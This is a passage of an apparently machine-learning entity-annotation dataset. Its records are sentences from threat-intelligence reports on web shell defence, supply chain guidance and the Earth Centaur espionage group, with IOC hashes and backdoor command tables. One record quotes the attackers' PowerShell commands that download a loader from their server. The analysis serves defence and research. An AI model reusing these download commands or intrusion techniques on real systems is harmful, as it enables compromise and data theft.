p.dat · C:\\Oracle\\Oracle.dat · C:\\Program Files\\McAfee\\MacAfee.dat These suspicious activities were seen via our XDR solution, which helped us monitor observable attack techniques and provided critical security alerts including anomalous file extension execution, remote execution via system tools, web shell-related activities, and potential exploit attacks.","entities":[{"id":49817,"label":"FILEPATH","start_offset":9,"end_offset":48},{"id":49818,"label":"FILEPATH","start_offset":58,"end_offset":78},{"id":49819,"label":"FILEPATH","start_offset":88,"end_offset":124}],"relations":[],"Comments":[]} {"id":3961,"text":" Security recommendations","entities":[],"relations":[],"Comments":[]} {"id":3962,"text":"Web shells can be embedded in systems via security gaps such as vulnerabilities.","entities":[{"id":49820,"label":"attack-pattern","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3963,"text":"Attackers will work to identify vulnerable applications used in systems to exploit them and install web shells for remote code execution or data exfiltration.","entities":[{"id":49821,"label":"attack-pattern","start_offset":115,"end_offset":136},{"id":49822,"label":"attack-pattern","start_offset":92,"end_offset":110},{"id":49823,"label":"attack-pattern","start_offset":140,"end_offset":157}],"relations":[],"Comments":[]} {"id":3964,"text":"We provide some security recommendations to ensure that enterprises and organizations can defend against web shell attacks: ","entities":[{"id":49824,"label":"attack-pattern","start_offset":105,"end_offset":122}],"relations":[],"Comments":[]} {"id":3965,"text":"Patch your systems and applications.","entities":[],"relations":[],"Comments":[]} {"id":3966,"text":"Ensure proper vulnerability patches are applied for public-facing applications, such as Apache Tomcat, Oracle Web Logic Server, Microsoft Exchange Server, and PHPMyAdmin.","entities":[{"id":49827,"label":"SOFTWARE","start_offset":128,"end_offset":153},{"id":49826,"label":"SOFTWARE","start_offset":103,"end_offset":126},{"id":49825,"label":"SOFTWARE","start_offset":88,"end_offset":101},{"id":49828,"label":"SOFTWARE","start_offset":159,"end_offset":169}],"relations":[],"Comments":[]} {"id":3967,"text":"Implement strong passwords.","entities":[],"relations":[],"Comments":[]} {"id":3968,"text":"Do not use the same password for multiple applications or websites.","entities":[],"relations":[],"Comments":[]} {"id":3969,"text":"Use multi-factor authentication whenever possible and regularly update it.","entities":[],"relations":[],"Comments":[]} {"id":3970,"text":"Check for static keys in the IIS web.config file.","entities":[{"id":49829,"label":"FILEPATH","start_offset":33,"end_offset":43}],"relations":[],"Comments":[]} {"id":3971,"text":" As observed on CVE-2020-0688, the use of static keys — as opposed to randomly generated keys — can allow an attacker to execute arbitrary code by tricking the server into deserializing ViewState data.","entities":[{"id":49830,"label":"vulnerability","start_offset":16,"end_offset":29},{"id":49831,"label":"attack-pattern","start_offset":121,"end_offset":143}],"relations":[{"id":868,"from_id":49830,"to_id":49831,"type":"uses"}],"Comments":[]} {"id":3972,"text":" Enterprises and organizations should have comprehensive and efficient protection, detection, prevention, and remediation based on real-time, higher-confidence alerts to protect critical data and operations from sophisticated attacks and threats.","entities":[],"relations":[],"Comments":[]} {"id":3973,"text":"A consolidated view of all security sensors provides a single-pane-of-glass view that will promote quick and thorough investigation and response.","entities":[],"relations":[],"Comments":[]} {"id":3974,"text":" Trend Micro Solutions Trend Micro’s comprehensive XDR solution applies the most effective expert analytics to the deep data sets collected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and networks — making faster connections to identify and stop attacks.","entities":[{"id":49834,"label":"identity","start_offset":25,"end_offset":36},{"id":49835,"label":"identity","start_offset":147,"end_offset":158},{"id":49833,"label":"SOFTWARE","start_offset":3,"end_offset":24}],"relations":[],"Comments":[]} {"id":3975,"text":"Powerful artificial intelligence (AI) and expert security analytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection.","entities":[{"id":49836,"label":"identity","start_offset":114,"end_offset":125}],"relations":[],"Comments":[]} {"id":3976,"text":"One console with one source of prioritized, optimized alerts supported with guided investigation simplifies the steps needed to fully understand the attack path and impact on the organization.","entities":[],"relations":[],"Comments":[]} {"id":3977,"text":"Indicators of compromise Filename Path SHA-256 Detection Notes ss.exe C:\\temp\\ ee63b49aca1495a170ea7273316385b606f3fd2df1e48e9f4de0f241d98bd055 HackTool.Win32.CATLIKE.A Vulnerability Scanner LG.exe C:\\temp\\ C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool LG.dat C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool mpBD6D42.dat C:\\Users C:\\Perflogs C:\\hp C:\\temp e9be71848d1faa0c41db4c6a1e901747d98fb0b3cca027f8be85ea5e339b75e3 HackTool.MSIL.Mimikatz.AF Mimikatz Tags Endpoints | APT & Targeted Attacks | Research | Network | Articles, News, Reports","entities":[{"id":12061,"label":"SHA2","start_offset":227,"end_offset":291},{"id":12063,"label":"SHA2","start_offset":375,"end_offset":439},{"id":12060,"label":"SHA2","start_offset":87,"end_offset":151},{"id":12066,"label":"tools","start_offset":650,"end_offset":658},{"id":12065,"label":"SHA2","start_offset":557,"end_offset":621},{"id":49840,"label":"FILEPATH","start_offset":202,"end_offset":208},{"id":49845,"label":"malware","start_offset":623,"end_offset":648},{"id":49847,"label":"FILEPATH","start_offset":367,"end_offset":373},{"id":49848,"label":"FILEPATH","start_offset":507,"end_offset":519},{"id":49849,"label":"FILEPATH","start_offset":521,"end_offset":541},{"id":49850,"label":"FILEPATH","start_offset":542,"end_offset":555},{"id":49837,"label":"FILEPATH","start_offset":69,"end_offset":75},{"id":49842,"label":"FILEPATH","start_offset":219,"end_offset":225},{"id":49838,"label":"FILEPATH","start_offset":77,"end_offset":85},{"id":49839,"label":"malware","start_offset":153,"end_offset":177},{"id":49841,"label":"FILEPATH","start_offset":210,"end_offset":218},{"id":49843,"label":"malware","start_offset":293,"end_offset":317},{"id":49844,"label":"malware","start_offset":441,"end_offset":465},{"id":49846,"label":"FILEPATH","start_offset":359,"end_offset":365}],"relations":[{"id":869,"from_id":12060,"to_id":49839,"type":"indicates"},{"id":870,"from_id":49838,"to_id":49839,"type":"indicates"},{"id":871,"from_id":49837,"to_id":49839,"type":"indicates"},{"id":872,"from_id":12061,"to_id":49843,"type":"indicates"},{"id":873,"from_id":49842,"to_id":49843,"type":"indicates"},{"id":874,"from_id":49841,"to_id":49843,"type":"indicates"},{"id":875,"from_id":49840,"to_id":49843,"type":"indicates"},{"id":876,"from_id":49846,"to_id":49844,"type":"indicates"},{"id":877,"from_id":49847,"to_id":49844,"type":"indicates"},{"id":878,"from_id":12063,"to_id":49844,"type":"indicates"},{"id":879,"from_id":49848,"to_id":49845,"type":"indicates"},{"id":880,"from_id":49849,"to_id":49845,"type":"indicates"},{"id":881,"from_id":49850,"to_id":49845,"type":"indicates"},{"id":882,"from_id":12065,"to_id":49845,"type":"indicates"}],"Comments":[]} {"id":3978,"text":"The Cybersecurity and Infrastructure Security Agency (CISA) and the National Institute for Standards and Technology (NIST) recently published “Defending Against Software Supply Chain Attacks”.","entities":[{"id":49852,"label":"identity","start_offset":68,"end_offset":122},{"id":49851,"label":"identity","start_offset":4,"end_offset":59}],"relations":[],"Comments":[]} {"id":3979,"text":"The guideline provides an overview of software supply chain risk and how vendors and customers can identify and assess such risks using the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF).","entities":[],"relations":[],"Comments":[]} {"id":3980,"text":"Software supply chains are an integral part of a large information and communications technology (ICT) supply chain framework.","entities":[],"relations":[],"Comments":[]} {"id":3981,"text":"It is an ecosystem of retailers, distributors, and suppliers participating in the sale, delivery, and production of hardware, software, and managed services.","entities":[],"relations":[],"Comments":[]} {"id":3982,"text":"An attack on the software supply chain happens when a cyber threat actor invades a vendor's network and uses malicious codes, compromising the software before the vendor sends it to their consumers.","entities":[],"relations":[],"Comments":[]} {"id":3983,"text":"The compromised software will then put the customer's data or system at risk.","entities":[],"relations":[],"Comments":[]} {"id":3984,"text":"According to the guideline, newly acquired software may be compromised from the get-go.","entities":[],"relations":[],"Comments":[]} {"id":3985,"text":"It can also be compromised through a patch or hotfix.","entities":[],"relations":[],"Comments":[]} {"id":3986,"text":"These threats affect all users of the tampered software, resulting in major consequences for government, critical infrastructure, and private sector software consumers.","entities":[],"relations":[],"Comments":[]} {"id":3987,"text":"The guideline thoroughly explains the three most common methods threat groups use to infiltrate the supply chain.","entities":[],"relations":[],"Comments":[]} {"id":3988,"text":"It also establishes a few recommendations for software customers and vendors to prevent and mitigate attacks as well as improve resilience against software supply chain attacks.","entities":[],"relations":[],"Comments":[]} {"id":3989,"text":"The three most common methods are taking over the software update mechanism to deliver an updated software with malicious code, exploiting misconfigured access controls, and targeting publicly accessible code libraries, and inserting malicious code, which unknowing customers then download to their systems.","entities":[],"relations":[],"Comments":[]} {"id":3990,"text":"The document also provides the following eight best practices for establishing a C-SCRM approach and applying it to software: Incorporating C-SCRM across the organization; Creating a formal C-SCRM program; Knowing and managing critical components and suppliers; Understanding the organization's supply chain; Working closely with key suppliers; Including key suppliers in resilience and improvement activities; Evaluating and monitoring throughout the supplier relationship; and Planning for the full life cycle.","entities":[],"relations":[],"Comments":[]} {"id":3991,"text":" While the guideline gives thorough recommendations on preventing supply chain attacks, it is still vital for organizations to take extra measures to mitigate vulnerable software components.","entities":[],"relations":[],"Comments":[]} {"id":3992,"text":"Organizations should also create a program that can manage and control their supply chain's vulnerabilities, minimizing the possibilities of attacks.","entities":[],"relations":[],"Comments":[]} {"id":3993,"text":"In addition, organizations must know and understand the risks associated with supply chains and smart factories.","entities":[],"relations":[],"Comments":[]} {"id":3994,"text":"To learn more about overlooked risks associated with supply chain and smart factories, read our expert team's proof of concept paper, \"Forward-looking security analysis of smart factories\".","entities":[],"relations":[],"Comments":[]} {"id":3995,"text":"This extensive research also discusses feasible attack scenarios and recommended defense strategies.","entities":[],"relations":[],"Comments":[]} {"id":3996,"text":" Tags Latest News | Cloud | APT & Targeted Attacks | Network | Articles, News, Reports | Cyber Threats","entities":[],"relations":[],"Comments":[]} {"id":3997,"text":"The Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert regarding an advanced persistent threat (APT) compromising government agencies, critical infrastructures, and private sector organizations.","entities":[{"id":49853,"label":"identity","start_offset":4,"end_offset":59}],"relations":[],"Comments":[]} {"id":3998,"text":"According to CISA, the APT actor is accountable for the compromise of the SolarWinds Orion supply chain.","entities":[{"id":49854,"label":"identity","start_offset":13,"end_offset":17},{"id":49855,"label":"SOFTWARE","start_offset":74,"end_offset":91}],"relations":[],"Comments":[]} {"id":3999,"text":"The actor is also responsible for the abuse of commonly used authentication mechanisms.","entities":[{"id":49856,"label":"attack-pattern","start_offset":38,"end_offset":86}],"relations":[],"Comments":[]} {"id":4000,"text":"The Agency then urged organizations to make identifying and addressing such threats a priority.","entities":[],"relations":[],"Comments":[]} {"id":4001,"text":"Under the Presidential Policy Directive (PPD) 41, the agency, together with the Federal Bureau of Investigation (FBI), and the Office of the Director of National Intelligence (ODNI), formed a Cyber Unified Coordination Group (UCG).","entities":[{"id":49859,"label":"identity","start_offset":192,"end_offset":230},{"id":49857,"label":"identity","start_offset":80,"end_offset":117},{"id":49858,"label":"identity","start_offset":127,"end_offset":181}],"relations":[],"Comments":[]} {"id":4002,"text":"This group aims to coordinate a \"whole-of-government\" response to the above-mentioned cyber incident.?","entities":[],"relations":[],"Comments":[]} {"id":4003,"text":"A UCG is also formed for integrating private sector partners into incident response efforts.","entities":[{"id":49860,"label":"identity","start_offset":2,"end_offset":5}],"relations":[],"Comments":[]} {"id":4004,"text":"In general, a Cyber UCG is created when a vital cyber incident affects critical infrastructure owners and operators.","entities":[{"id":49861,"label":"identity","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} {"id":4005,"text":"These are determined by the Secretary of Homeland Security as possessing or operating critical infrastructure wherein a cyber incident could lead to a catastrophic regional or national effect on national security, economic security, or public health.","entities":[{"id":49862,"label":"identity","start_offset":28,"end_offset":58}],"relations":[],"Comments":[]} {"id":4006,"text":"Supply chain attacks are quite risky and could result in real-world impacts.","entities":[],"relations":[],"Comments":[]} {"id":4007,"text":"In a report done by Trend Micro entitled “Critical Infrastructures Exposed and at Risk: Energy and Water Industries”, researchers were able to expose vulnerabilities of human-machine interface (HMI) used in critical water and energy organizations.","entities":[{"id":49863,"label":"identity","start_offset":20,"end_offset":31}],"relations":[],"Comments":[]} {"id":4008,"text":"They also showed real-world implications that these vulnerabilities have.","entities":[],"relations":[],"Comments":[]} {"id":4009,"text":"Geopolitical risk is also a big concern for securing supply chains.","entities":[],"relations":[],"Comments":[]} {"id":4010,"text":"To mitigate such risk, organizations must think globally and exert efforts to follow codes of local culture.","entities":[],"relations":[],"Comments":[]} {"id":4011,"text":"Organizations need to have a deeper understanding of regional and national policies to ensure the safety of the supply chain.","entities":[],"relations":[],"Comments":[]} {"id":4012,"text":"Read our three-part series on smart factories from the perspective of supply chain disruptions to learn more about supply chain cybersecurity.","entities":[],"relations":[],"Comments":[]} {"id":4013,"text":" Tags Latest News | ICS OT | APT & Targeted Attacks | IoT |","entities":[],"relations":[],"Comments":[]} {"id":4014,"text":"Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4015,"text":"Earth Centaur, previously known as Tropic Trooper, is a long-running cyberespionage threat group that has been active since 2011.","entities":[{"id":49866,"label":"TIME","start_offset":118,"end_offset":128},{"id":49865,"label":"threat-actor","start_offset":35,"end_offset":49},{"id":49864,"label":"threat-actor","start_offset":0,"end_offset":13}],"relations":[{"id":883,"from_id":49864,"to_id":49865,"type":"duplicate-of"}],"Comments":[]} {"id":4016,"text":"In July 2020, we noticed interesting activity coming from the group, and we have been closely monitoring it since.","entities":[{"id":49867,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} {"id":4017,"text":"The actors seem to be targeting organizations in the transportation industry and government agencies related to transport.","entities":[],"relations":[],"Comments":[]} {"id":4018,"text":" We observed that the group tried to access some internal documents (such as flight schedules and documents for financial plans) and personal information on the compromised hosts (such as search histories).","entities":[],"relations":[],"Comments":[]} {"id":4019,"text":" Currently, we have not discovered substantial damage to these victims as caused by the threat group.","entities":[],"relations":[],"Comments":[]} {"id":4020,"text":"However, we believe that it will continue collecting internal information from the compromised victims and that it is simply waiting for an opportunity to use this data.","entities":[],"relations":[],"Comments":[]} {"id":4021,"text":"Through long-term monitoring, we learned that this threat group is proficient at red teamwork.","entities":[],"relations":[],"Comments":[]} {"id":4022,"text":"The group knows how to bypass security settings and keep its operation unobstructive.","entities":[],"relations":[],"Comments":[]} {"id":4023,"text":"Depending on the target, it uses backdoors with different protocols, and it can also use the reverse proxy to bypass the monitoring of network security systems.","entities":[],"relations":[],"Comments":[]} {"id":4024,"text":"The usage of the open-source frameworks also allows the group to develop new backdoor variants efficiently.","entities":[],"relations":[],"Comments":[]} {"id":4025,"text":"We expand on these techniques and other capabilities in the following sections.","entities":[],"relations":[],"Comments":[]} {"id":4026,"text":" More importantly, we believe the activities we observed are just the tip of the iceberg and their targets might be expanded to other industries that are related to transportation.","entities":[],"relations":[],"Comments":[]} {"id":4027,"text":"It is our aim, through this article, to encourage enterprises to review their own security setting and protect themselves from damage and compromise.","entities":[],"relations":[],"Comments":[]} {"id":4028,"text":" Overview of Earth Centaur’s infection chain","entities":[{"id":49868,"label":"threat-actor","start_offset":14,"end_offset":27}],"relations":[],"Comments":[]} {"id":4029,"text":"Based on our investigation, we found that the intrusion process used by Earth Centaur can be separated into several stages, which are shown in Figure 1.","entities":[{"id":49869,"label":"threat-actor","start_offset":72,"end_offset":85}],"relations":[],"Comments":[]} {"id":4030,"text":" We found that the threat actors used vulnerable Internet Information Services (IIS) server and Exchange server vulnerabilities as entry points, and then installed web shells.","entities":[{"id":49871,"label":"vulnerability","start_offset":96,"end_offset":127},{"id":49872,"label":"vulnerability","start_offset":38,"end_offset":91},{"id":49873,"label":"attack-pattern","start_offset":164,"end_offset":174}],"relations":[{"id":884,"from_id":49872,"to_id":49873,"type":"uses"},{"id":885,"from_id":49871,"to_id":49873,"type":"uses"}],"Comments":[]} {"id":4031,"text":"Afterward, the .NET loader (detected as Nerapack) and the first stage backdoor (Quasar remote administration tool aka Quasar RAT) were deployed on the compromised machine.","entities":[{"id":49875,"label":"malware","start_offset":80,"end_offset":113},{"id":49874,"label":"malware","start_offset":40,"end_offset":48},{"id":49876,"label":"malware","start_offset":118,"end_offset":128}],"relations":[{"id":887,"from_id":49875,"to_id":49876,"type":"duplicate-of"},{"id":888,"from_id":49874,"to_id":49876,"type":"delivers"}],"Comments":[]} {"id":4032,"text":"Then, depending on the victims, the threat actors dropped different types of second-stage backdoors, such as ChiserClient and SmileSvr.","entities":[{"id":49877,"label":"malware","start_offset":109,"end_offset":121},{"id":49878,"label":"malware","start_offset":126,"end_offset":134}],"relations":[],"Comments":[]} {"id":4033,"text":"After exploiting the victim's environments successfully, the threat actors start Active Directory (AD) discovery and spread their tools via Server Message Block (SMB).","entities":[],"relations":[],"Comments":[]} {"id":4034,"text":"Then, they use intranet penetration tools to build the connection between the victim’s intranet and their command-and-control (C&C) servers.","entities":[],"relations":[],"Comments":[]} {"id":4035,"text":"We go into further detail about these stages in our analysis.","entities":[],"relations":[],"Comments":[]} {"id":4036,"text":" Figure 1. Stages of Earth Centaur’s intrusion process Technical Analysis of Earth Centaur’s Tools and Techniques Stage 1: Loaders","entities":[{"id":49880,"label":"threat-actor","start_offset":87,"end_offset":100},{"id":49879,"label":"threat-actor","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} {"id":4037,"text":"After the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use bitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin). C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http:\/\/:8000\/dfmanager.exe' \"%temp%\/dfmanager.exe\"}\" C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http:\/\/:8000\/dfmanager.bin' \"C:\\Users\\\\AppData\\Local\\Temp\/dfmanager.bin\"}\"","entities":[{"id":49882,"label":"attack-pattern","start_offset":92,"end_offset":102},{"id":49888,"label":"FILEPATH","start_offset":385,"end_offset":405},{"id":49891,"label":"URL","start_offset":566,"end_offset":618},{"id":49889,"label":"FILEPATH","start_offset":409,"end_offset":466},{"id":49883,"label":"tools","start_offset":113,"end_offset":122},{"id":49884,"label":"malware","start_offset":182,"end_offset":190},{"id":49885,"label":"threat-actor","start_offset":10,"end_offset":23},{"id":49886,"label":"FILEPATH","start_offset":228,"end_offset":285},{"id":49887,"label":"URL","start_offset":346,"end_offset":382},{"id":49881,"label":"vulnerability","start_offset":68,"end_offset":87},{"id":49890,"label":"URL","start_offset":527,"end_offset":563}],"relations":[{"id":889,"from_id":49885,"to_id":49881,"type":"exploits"},{"id":890,"from_id":49885,"to_id":49882,"type":"uses"},{"id":891,"from_id":49885,"to_id":49883,"type":"uses"},{"id":892,"from_id":49883,"to_id":49884,"type":"downloads"}],"Comments":[]} {"id":4038,"text":"After our long-term monitoring, we observed that there are two different decryption algorithms (DES or AES) used in Nerapack to decrypt the payload.","entities":[{"id":49892,"label":"malware","start_offset":116,"end_offset":124}],"relations":[],"Comments":[]} {"id":4039,"text":"Moreover, in its newer version, it uses a technique called “Timestomping.”","entities":[],"relations":[],"Comments":[]} {"id":4040,"text":"Timestomping is when the timestamp of the payload file (.bin) is altered to make it harder for incident response analysts to find it.","entities":[],"relations":[],"Comments":[]} {"id":4041,"text":" Figure 2. Timestomping used on the bin file The decryption key is used as an argument of Nerapack and various keys are used on different victims.","entities":[{"id":49893,"label":"malware","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} {"id":4042,"text":"It is a simple but effective technique that makes security analysis more difficult and also ensures that only their operators can use the tools.","entities":[],"relations":[],"Comments":[]} {"id":4043,"text":"The command for execution is shown as here: > Nerapack.exe {base64 encoded key}","entities":[{"id":49894,"label":"FILEPATH","start_offset":46,"end_offset":58}],"relations":[],"Comments":[]} {"id":4044,"text":"Fortunately, we were still able to collect the decryption key in some cases and we decrypted the payload successfully.","entities":[],"relations":[],"Comments":[]} {"id":4045,"text":"Based on our current cases, the decrypted payload is Quasar RAT.","entities":[{"id":12265,"label":"malware","start_offset":53,"end_offset":63}],"relations":[],"Comments":[]} {"id":4046,"text":"After the payload is deployed, the actors can continue further malicious actions through Quasar RAT.","entities":[{"id":49895,"label":"malware","start_offset":89,"end_offset":99}],"relations":[],"Comments":[]} {"id":4047,"text":"Stage 2: Backdoors","entities":[],"relations":[],"Comments":[]} {"id":4048,"text":"After further analysis, we found that the threat group developed multiple backdoors capable of communication via common network protocols.","entities":[],"relations":[],"Comments":[]} {"id":4049,"text":"We think this indicates that it has the capability to bypass network security systems by using these common protocols to transfer data.","entities":[{"id":49896,"label":"attack-pattern","start_offset":54,"end_offset":85}],"relations":[],"Comments":[]} {"id":4050,"text":"We also found that the group tries to launch various backdoors per victim.","entities":[{"id":49897,"label":"attack-pattern","start_offset":38,"end_offset":62}],"relations":[],"Comments":[]} {"id":4051,"text":"Furthermore, it also tends to use existing frameworks to make customized backdoors.","entities":[{"id":49898,"label":"attack-pattern","start_offset":57,"end_offset":82}],"relations":[],"Comments":[]} {"id":4052,"text":"By using existing frameworks, examples of which are detailed in the following, it builds new backdoor variants more efficiently.","entities":[],"relations":[],"Comments":[]} {"id":4053,"text":"ChiserClient","entities":[{"id":12272,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":4054,"text":"After the backdoor is launched, it will decrypt the embedded C&C configuration via AES (CTR mode) algorithm for the following connection.","entities":[],"relations":[],"Comments":[]} {"id":4055,"text":"In the configuration, there are three C&C addresses and corresponding port numbers.","entities":[],"relations":[],"Comments":[]} {"id":4056,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":4057,"text":"Decrypted C&C configuration ","entities":[],"relations":[],"Comments":[]} {"id":4058,"text":"In the first connection, ChiserClient will append the host name of the compromised host for check-in purposes.","entities":[{"id":49899,"label":"malware","start_offset":25,"end_offset":37}],"relations":[],"Comments":[]} {"id":4059,"text":"Then, it will keep running on the hosts and wait for further commands from the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":4060,"text":"ChiserClient is installed as a system service to allow the threat actors access to higher privileges and keep persistence on the compromised host.","entities":[{"id":49900,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":4061,"text":"The capability of ChiserClient is shown in the following table: Command code Function 0x10001","entities":[{"id":12290,"label":"malware","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} {"id":4062,"text":"Write specified file 0x10002","entities":[],"relations":[],"Comments":[]} {"id":4063,"text":"Download File 0x10003","entities":[],"relations":[],"Comments":[]} {"id":4064,"text":"Read specified file 0x10004","entities":[],"relations":[],"Comments":[]} {"id":4065,"text":"No Action 0x10005","entities":[],"relations":[],"Comments":[]} {"id":4066,"text":"Open a command shell for command execution ","entities":[],"relations":[],"Comments":[]} {"id":4067,"text":"HTShell HTShell is a simple backdoor that is developed using the Mongoose framework (version 6.15).","entities":[{"id":49901,"label":"malware","start_offset":0,"end_offset":7},{"id":49902,"label":"malware","start_offset":8,"end_offset":15},{"id":49903,"label":"tools","start_offset":65,"end_offset":98}],"relations":[],"Comments":[]} {"id":4068,"text":"Mongoose is an Object Data Modeling (ODM) library for MongoDB and Node.Js.","entities":[{"id":49904,"label":"tools","start_offset":0,"end_offset":8},{"id":49905,"label":"SOFTWARE","start_offset":54,"end_offset":61},{"id":49906,"label":"SOFTWARE","start_offset":66,"end_offset":73}],"relations":[],"Comments":[]} {"id":4069,"text":"It is used to translate between objects in code and objects representation in MongoDB.","entities":[{"id":49907,"label":"SOFTWARE","start_offset":78,"end_offset":85}],"relations":[],"Comments":[]} {"id":4070,"text":"We saw in our cases that the HTShell client will be launched as a system service on the compromised machine and that it will connect to a C&C server.","entities":[{"id":49908,"label":"malware","start_offset":29,"end_offset":36}],"relations":[],"Comments":[]} {"id":4071,"text":"HTShell supports importing additional config files.","entities":[{"id":49909,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":4072,"text":"We found that the additional config file is located in %PUBLIC%\\Documents\\sdcsvc.dat, and that the content should be encoded by base64.","entities":[{"id":49910,"label":"FILEPATH","start_offset":55,"end_offset":84}],"relations":[],"Comments":[]} {"id":4073,"text":"If no config file is imported, it will connect to the predefined C&C address.","entities":[],"relations":[],"Comments":[]} {"id":4074,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":4075,"text":"HTShell hardcoded C&Cs HTShell encodes a hard­-coded string, \"tp===\" with custom base64 and embeds the encoded string in the request cookies.","entities":[{"id":49911,"label":"malware","start_offset":0,"end_offset":7},{"id":49912,"label":"malware","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} {"id":4076,"text":"If the C&C server receives the request with the special cookie value, it can verify that the request comes from its client applications.","entities":[],"relations":[],"Comments":[]} {"id":4077,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":4078,"text":"HTShell hardcoded and encoded cookie string in the request header The response handler of HTShell will use “`” as delimiter to split the command code and argument for the received command.","entities":[{"id":49914,"label":"malware","start_offset":94,"end_offset":101},{"id":49913,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":4079,"text":"Hence, the command will be this format: `[`] HTShell currently supports three different backdoor functions, shown here: Command code Function 0 Open a command shell for command execution 1","entities":[{"id":49915,"label":"malware","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} {"id":4080,"text":"Upload file 2 Download file","entities":[],"relations":[],"Comments":[]} {"id":4081,"text":" Customized Lilith RAT ","entities":[{"id":12317,"label":"malware","start_offset":12,"end_offset":22}],"relations":[],"Comments":[]} {"id":4082,"text":"During our investigation into Earth Centaurs activities, we found that it also uses another backdoor called Lilith RAT.","entities":[{"id":49916,"label":"threat-actor","start_offset":30,"end_offset":44},{"id":49917,"label":"malware","start_offset":108,"end_offset":118}],"relations":[{"id":893,"from_id":49916,"to_id":49917,"type":"uses"}],"Comments":[]} {"id":4083,"text":"We think that this Lilith RAT is a highly modified version of the open-source Lilith RAT.","entities":[{"id":49919,"label":"malware","start_offset":78,"end_offset":88},{"id":49918,"label":"malware","start_offset":19,"end_offset":29}],"relations":[],"Comments":[]} {"id":4084,"text":"The actors reused part of the codes for command execution, while the C&C protocol is changed to Dropbox HTTPS APIs.","entities":[],"relations":[],"Comments":[]} {"id":4085,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":4086,"text":"Reused codes from open-source Lilith RAT In order to launch this RAT, the threat actors use a technique called \"Phantom DLL hijacking.\"","entities":[{"id":49920,"label":"malware","start_offset":30,"end_offset":40},{"id":49921,"label":"attack-pattern","start_offset":116,"end_offset":137}],"relations":[],"Comments":[]} {"id":4087,"text":"In this technique, the RAT will be disguised as the normal wlbsctrl.dll.","entities":[{"id":49922,"label":"FILEPATH","start_offset":59,"end_offset":71}],"relations":[],"Comments":[]} {"id":4088,"text":"While the Windows service “IKEEXT” is starting, the fake wlbsctrl.dll is loaded and executed with high privilege.","entities":[],"relations":[],"Comments":[]} {"id":4089,"text":"Furthermore, when Lilith RAT is terminated, it will try to clean itself to prevent being found by investigators.","entities":[{"id":49923,"label":"malware","start_offset":18,"end_offset":28}],"relations":[],"Comments":[]} {"id":4090,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":4091,"text":"Self-deletion after execution ","entities":[],"relations":[],"Comments":[]} {"id":4092,"text":"For the C&C connections, the customized Lilith RAT will first check in to the attacker’s Dropbox and see if the victim host exists.","entities":[{"id":49925,"label":"SOFTWARE","start_offset":89,"end_offset":96},{"id":49924,"label":"malware","start_offset":40,"end_offset":50}],"relations":[],"Comments":[]} {"id":4093,"text":"If not, the hostname and IP address will be collected and appended to the existing compromised hosts’ information.","entities":[],"relations":[],"Comments":[]} {"id":4094,"text":"All data will then be encrypted and sent back. Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":4095,"text":"The first check-in request to the Dropbox C&C After the check-in request, the backdoor will start to wait for more commands to come in.","entities":[],"relations":[],"Comments":[]} {"id":4096,"text":"All the request data are formatted to JSON, and they are encrypted by AES and encoded by base64.","entities":[],"relations":[],"Comments":[]} {"id":4097,"text":"Here is a list of the C&C commands:","entities":[],"relations":[],"Comments":[]} {"id":4098,"text":" Command Description CMDCommand Executes commands DownloadCloudFile Downloads files UploadCloudFile Uploads files GetDir Lists directories GetDirFile Lists files in a directory DeleteSelf Deletes itself SmileSvr ","entities":[],"relations":[],"Comments":[]} {"id":4099,"text":"We found that there are two types of SmileSvr.","entities":[],"relations":[],"Comments":[]} {"id":4100,"text":"The difference between the two variants is the protocol used for communication: ICMP and SSL.","entities":[],"relations":[],"Comments":[]} {"id":4101,"text":"The threat actors will use an installer to install SmileSvr as a system service and drop a DAT file that contains encoded C&C information.","entities":[],"relations":[],"Comments":[]} {"id":4102,"text":"In the configuration file, the memory size used for storing C&C address and C&C address will be defined.","entities":[],"relations":[],"Comments":[]} {"id":4103,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":4104,"text":"Encrypted configuration file ","entities":[],"relations":[],"Comments":[]} {"id":4105,"text":"The ICMP version of SmileSvr will create an ICMP socket to connect to the specified C&C address, which is defined in a configuration file.","entities":[],"relations":[],"Comments":[]} {"id":4106,"text":"In each SmileSvr, there is an embedded number (e.g., 10601 in Figure 10.) and this value will be used as sequence number in the sent ICMP packet.","entities":[],"relations":[],"Comments":[]} {"id":4107,"text":"We think attackers use this value to verify if the incoming 